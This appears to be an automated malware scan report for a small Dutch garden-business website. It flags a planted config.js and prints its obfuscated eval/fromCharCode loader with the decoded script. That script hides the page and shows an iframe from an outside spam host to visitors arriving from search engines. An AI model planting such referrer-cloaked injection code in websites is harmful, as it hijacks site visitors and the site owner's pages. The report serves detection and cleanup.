Scanned pages/files
Request | Server response | Status |
http://www.slagter-tuinen.nl/ | HTTP/1.1 200 OK Date: Mon, 15 Dec 2014 15:57:23 GMT Accept-Ranges: bytes ETag: "c18b722b1d11d01:1e8f19" Server: Microsoft-IIS/6.0 Content-Length: 3970 Content-Location: http://www.slagter-tuinen.nl/index.html Content-Type: text/html Last-Modified: Sat, 06 Dec 2014 06:23:37 GMT X-Powered-By: ASP.NET | clean |
http://www.slagter-tuinen.nl/index.html | 200 OK Content-Length: 3970 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://www.slagter-tuinen.nl/script.js | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://www.slagter-tuinen.nl/tel:0648015930 | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.slagter-tuinen.nl/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.slagter-tuinen.nl/contact.html | 200 OK Content-Length: 2111 Content-Type: text/html | clean |
http://www.slagter-tuinen.nl/teshe/adidas-spike-lethal-zone.html | 200 OK Content-Length: 4824 Content-Type: text/html | clean |
http://www.slagter-tuinen.nl/teshe/config.js | 200 OK Content-Length: 1300 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. eval(String.fromCharCode(118,97,114,32,114,101,103,101,120,112,61,47,92,46,40,97,111,108,124,103,111,111,103,108,101,124,121,111,117,100,97,111,124,121,97,104,111,111,124,98,105,110,103,124,49,49,56,49,49,52,124,98,105,115,111,124,103,111,117,103,111,117,124,105,102,101,110,103,124,105,118,99,124,115,111,111,117,108,101,124,110,105,117,104,117,124,98,105,115,111,41,40,92,46,91,97,45,122,48,45,57,92,45,93,43,41,123,49,44,50,125,92,47,63,47,105,103,5 ...[848 bytes skipped]... Decoded script: var regexp=/\.(aol|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\/?/ig; var where=document.referrer;if(regexp.test(where)){var body=document.body;body.style.visibility='visible';body.innerHTML="<iframe name='framain' frameborder='0' height='2630' scrolling='no' src='http://ugghome.jp' width='100%' />";} var regexp=/\.(aol|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\/?/ig; var where=document.referrer;if(regexp.test(where)){var body=document.body;body.style.visibility='visible';body.innerHTML="<iframe name='framain' frameborder='0' height='2630' scrolling='no' src='http://ugghome.jp' width='100%' />";} |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: slagter-tuinen.nl
Result:
GET / HTTP/1.1
Host: slagter-tuinen.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: slagter-tuinen.nl
Referer: http://www.google.com/search?q=slagter-tuinen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: slagter-tuinen.nl
Referer: http://www.google.com/search?q=slagter-tuinen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=slagter-tuinen.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://slagter-tuinen.nl/
Result: slagter-tuinen.nl is not infected or malware details are not published yet.
Result: slagter-tuinen.nl is not infected or malware details are not published yet.